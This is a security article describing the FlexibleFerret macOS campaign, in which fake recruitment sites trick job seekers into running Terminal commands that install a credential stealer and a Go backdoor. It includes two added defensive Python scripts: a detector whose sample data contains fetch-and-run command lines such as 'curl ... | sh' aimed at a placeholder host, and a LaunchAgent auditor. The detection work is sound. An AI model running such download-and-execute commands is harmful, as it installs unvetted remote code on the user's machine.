Cybercriminals are employing a sophisticated social engineering scheme, dubbed FlexibleFerret, that exploits Apple users by tricking them into running malicious commands on their Macs. This evolving threat, attributed to North Korean operators, continues the tactics seen in the Contagious Interview campaign active throughout 2025. The malware primarily spreads through deceptive job recruitment websites, promising employment but ultimately delivering credential-stealing backdoors and unauthorized system access.
FlexibleFerret Targets Apple Users with Deceptive Recruitment Schemes
The FlexibleFerret attack begins by luring job seekers to realistic-looking hiring assessment websites, such as evaluza.com and proficiencycert.com. Victims are led to believe they are participating in legitimate job assessments, often branded with plausible titles like “Blockchain Capital Operations Manager Hiring Assessment.” During these fraudulent evaluations, individuals are prompted to provide personal details and even record video introductions. The critical juncture of the attack occurs when applicants are instructed to run a specific Terminal command, purportedly to resolve camera or microphone access issues.
Jamf security analysts identified this new malware variant after observing in-the-wild detections linked to a script named macpatch.sh. Researchers discovered JavaScript files embedded within these fraudulent recruitment sites. When executed, these files construct and run curl commands that download malicious payloads directly onto the victim’s computer, without the victim understanding what is actually being installed.
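The page describes the pivot point of the campaign as a curl command the victim is talked into running in Terminal. A defender who collects process command lines (from an EDR agent or macOS unified logging) can flag the generic "fetch a remote script and execute it" shapes that such lures rely on. The example below is added here and is not code from the article or from Jamf; the sample command lines, the hostname `assessment.example.invalid` and the pattern names are constructed for illustration.

```python
from __future__ import annotations

import re

# Constructed sample process command lines, in the shape an EDR or log
# collector might report them. None of these are taken from the article;
# the hostname is a reserved .invalid name so nothing here resolves.
SAMPLE_CMDLINES = [
    "curl -sL https://assessment.example.invalid/fix.sh | sh",
    "curl -o /tmp/macpatch.sh https://assessment.example.invalid/macpatch.sh && sh /tmp/macpatch.sh",
    'bash -c "$(curl -fsSL https://assessment.example.invalid/a.sh)"',
    "curl -O https://assessment.example.invalid/report.pdf",
    "ls -la /Applications",
    "wget -qO- http://assessment.example.invalid/x.sh | bash",
]

FETCHERS = r"(?:curl|wget)"
SHELLS = r"(?:sh|bash|zsh)"
TMP_DIRS = r"(?:/tmp/|/private/tmp/|/var/folders/|/private/var/folders/|\$TMPDIR)"

# Each pattern names one download-and-execute shape. A plain download
# (pattern 4 in the samples) or an unrelated command matches none of them.
PATTERNS = {
    # curl ... | sh
    "pipe_to_shell": re.compile(
        rf"\b{FETCHERS}\b[^|]*\|\s*(?:sudo\s+)?{SHELLS}\b"),
    # curl -o /path ... && sh /path   (download to disk, then run it)
    "download_then_exec": re.compile(
        rf"\b{FETCHERS}\b.*\s-[oO]\b.*(?:&&|;)\s*(?:sudo\s+)?{SHELLS}\b"),
    # bash -c "$(curl ...)"   (command substitution, nothing touches disk)
    "command_substitution": re.compile(
        rf"\b{SHELLS}\s+-c\s+[\"']?\$\(\s*{FETCHERS}\b"),
    # sh /tmp/...   (interpreter launched on a script in a temp dir)
    "exec_from_tmp": re.compile(
        rf"\b{SHELLS}\s+{TMP_DIRS}"),
}


def classify_cmdline(cmdline: str) -> list[str]:
    """Return the names of every suspicious pattern that matches a command line."""
    return [name for name, rx in PATTERNS.items() if rx.search(cmdline)]


def scan(cmdlines: list[str]) -> dict[str, list[str]]:
    """Map each flagged command line to the pattern names it triggered."""
    findings = {}
    for cmd in cmdlines:
        hits = classify_cmdline(cmd)
        if hits:
            findings[cmd] = hits
    return findings


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_CMDLINES).items():
        print(f"{', '.join(hits):>40}  {cmd}")
```

The patterns are deliberately coarse: they catch the shape of the command rather than any particular domain or filename, so a renamed script or a fresh lure site still triggers them. In a real deployment you would feed the same classifier from your process-creation telemetry and treat any hit on an end-user workstation as worth a look, since ordinary users rarely type these forms.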
Infection Mechanism and Payload Delivery
The infection mechanism for FlexibleFerret uses a multi-stage delivery process designed to stay out of the user’s sight. Once the initial curl command is executed, it downloads a shell script. This script checks whether the victim’s Mac uses an ARM64 or Intel processor and then fetches the matching stage-two payload. The script establishes working directories within temporary locations. Persistence is achieved through the creation of LaunchAgents, which automatically launch the malware upon system login.
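Two facts in this passage give a defender something concrete to audit: the dropper stages files in temporary locations, and both the dropper and the later backdoor persist through LaunchAgents. A LaunchAgent whose executable or script argument lives under a temp directory has no legitimate reason to exist, so an audit of ~/Library/LaunchAgents can surface that combination. The script below is an added example, not code from the article or from Jamf; the two sample plists it writes (a benign updater and a suspicious one pointing at /private/tmp) are constructed for the demonstration and are not real indicators from the campaign.

```python
from __future__ import annotations

import os
import plistlib
import tempfile
from pathlib import Path

# Locations a LaunchAgent should never execute from. Legitimate agents live
# under /Applications, /usr/local, /Library or ~/Library, not in scratch space.
TEMP_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")

# Paths Apple's own agents plausibly run from; anything else under a
# "com.apple." label is a spoofed name.
APPLE_PREFIXES = ("/System/", "/usr/", "/bin/", "/sbin/", "/Library/Apple/")


def program_path(plist: dict) -> str | None:
    """Return the executable a LaunchAgent would run (Program, else ProgramArguments[0])."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments")
    if isinstance(args, list) and args:
        return str(args[0])
    return None


def audit_plist(plist: dict) -> list[str]:
    """Return the reasons one LaunchAgent plist looks suspicious (empty list if none)."""
    reasons: list[str] = []
    path = program_path(plist)
    if path is None:
        return ["no Program/ProgramArguments key"]
    if path.startswith(TEMP_PREFIXES):
        reasons.append(f"executable in temporary location: {path}")
    # An interpreter such as /bin/sh is harmless; the script it is handed is not.
    for arg in (plist.get("ProgramArguments") or [])[1:]:
        if str(arg).startswith(TEMP_PREFIXES):
            reasons.append(f"argument references temporary location: {arg}")
    label = str(plist.get("Label", ""))
    if label.startswith("com.apple.") and not path.startswith(APPLE_PREFIXES):
        reasons.append(f"Apple-looking label {label!r} runs non-Apple path {path}")
    if plist.get("RunAtLoad") and reasons:
        reasons.append("RunAtLoad set: executes at login")
    return reasons


def audit_launch_agents(directory: str | os.PathLike) -> dict[str, list[str]]:
    """Audit every .plist in a LaunchAgents directory; return only the flagged ones."""
    findings: dict[str, list[str]] = {}
    for p in sorted(Path(directory).glob("*.plist")):
        try:
            with open(p, "rb") as fh:
                plist = plistlib.load(fh)
        except Exception as exc:  # malformed or non-plist file is itself notable
            findings[p.name] = [f"unparseable plist: {exc}"]
            continue
        reasons = audit_plist(plist)
        if reasons:
            findings[p.name] = reasons
    return findings


def build_sample_agents() -> str:
    """Write two constructed sample plists to a fresh temp dir and return its path."""
    d = tempfile.mkdtemp(prefix="launchagents_demo_")
    samples = {
        "com.example.updater.plist": {          # benign: app-bundled updater
            "Label": "com.example.updater",
            "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/updater", "--check"],
            "RunAtLoad": True,
        },
        "com.apple.helper.plist": {             # constructed suspicious sample, not a real IoC
            "Label": "com.apple.helper",
            "ProgramArguments": ["/bin/sh", "/private/tmp/.cache/agent.sh"],
            "RunAtLoad": True,
            "KeepAlive": True,
        },
    }
    for name, content in samples.items():
        with open(os.path.join(d, name), "wb") as fh:
            plistlib.dump(content, fh)
    return d


if __name__ == "__main__":
    # Demonstrate on the constructed samples, then on the real user directory if present.
    print(audit_launch_agents(build_sample_agents()))
    real = os.path.expanduser("~/Library/LaunchAgents")
    if os.path.isdir(real):
        print(audit_launch_agents(real))
```

The audit reports the benign updater as clean and flags the constructed sample twice: once for the script argument under /private/tmp and once because RunAtLoad makes it fire at every login, which is exactly the behaviour the article attributes to the malware's persistence. Running the same function over /Library/LaunchAgents and /Library/LaunchDaemons extends the check to system-wide entries.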
Simultaneously, the attackers deploy a convincing fake Chrome application. This decoy application mimics a legitimate password prompt, aiming to capture any credentials users enter. The captured information is then exfiltrated to a Dropbox account under the attackers’ control. This credential harvesting is a primary objective of the FlexibleFerret campaign, enabling further compromise.
Payload Execution and Command-and-Control
The third stage of the infection is activated by a bundled Golang backdoor. This backdoor establishes a communication channel with a command-and-control (C2) server operated by the threat actors. This sophisticated component grants attackers extensive capabilities, including the collection of system information, the ability to upload and download files, arbitrary command execution on the compromised system, theft of Chrome browser profiles, and automated credential harvesting.
To ensure its continued operation, the backdoor implements persistence mechanisms via LaunchAgent entries. It also includes robust error-handling features designed to reset the malware if temporary failures occur during its operation. This resilience ensures that if one component of the attack fails, the malware can attempt to recover and re-establish its presence.
Mitigation and User Awareness
Organizations are advised to educate their employees about the risks associated with unsolicited job assessment requests, particularly those that involve executing commands in the Terminal. Any recruitment communication that asks users to run system commands should be treated as a significant red flag and reported immediately to internal security teams. Vigilance and a healthy skepticism towards unusual requests are crucial in preventing successful social engineering attacks like FlexibleFerret. By understanding the tactics used by these cybercriminals, Apple users can better protect themselves from these evolving threats.